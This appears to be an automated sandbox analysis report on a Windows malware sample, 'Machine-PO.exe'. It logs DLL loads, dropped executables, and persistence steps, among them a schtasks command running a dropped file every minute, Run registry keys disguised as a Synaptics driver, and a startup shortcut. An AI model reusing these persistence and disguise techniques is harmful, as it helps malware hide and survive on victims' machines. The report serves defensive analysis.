                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: idstore.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: twinapi.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: wlidprov.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: provsvc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: linkinfo.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                              Source: C:\Users\user\Desktop\Machine-PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: UAINOJ.lnk.2.drLNK file: ..\..\..\..\..\Windata\TCPKPY.exe
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\zstTfPJ.iniJump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                              Source: Machine-PO.exeStatic file information: File size 2208256 > 1048576
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: Machine-PO.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x170a00
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_002620F6 LoadLibraryA,GetProcAddress,10_2_002620F6
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00227795 push ecx; ret 10_2_002277A8

                              Persistence and Installation Behavior

                              barindex
                              Drops PE files to the document folder of the user
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\PIVFAGEAAV\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile created: C:\ProgramData\Synaptics\RCX7868.tmpJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\PIVFAGEAAV\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile created: C:\Users\user\Desktop\._cache_Machine-PO.exeJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeFile created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeJump to dropped file
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile created: C:\ProgramData\Synaptics\RCX7868.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\PIVFAGEAAV\~$cache1Jump to dropped file

                              Boot Survival

                              barindex
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UAINOJ.lnkJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UAINOJ.lnkJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UAINOJJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UAINOJJump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Icon mismatch, binary includes an icon from a different legit application in order to fool users
                              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (2112).png
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0021F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_0021F78E
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00267F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00267F0E
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00221E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_00221E5A
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
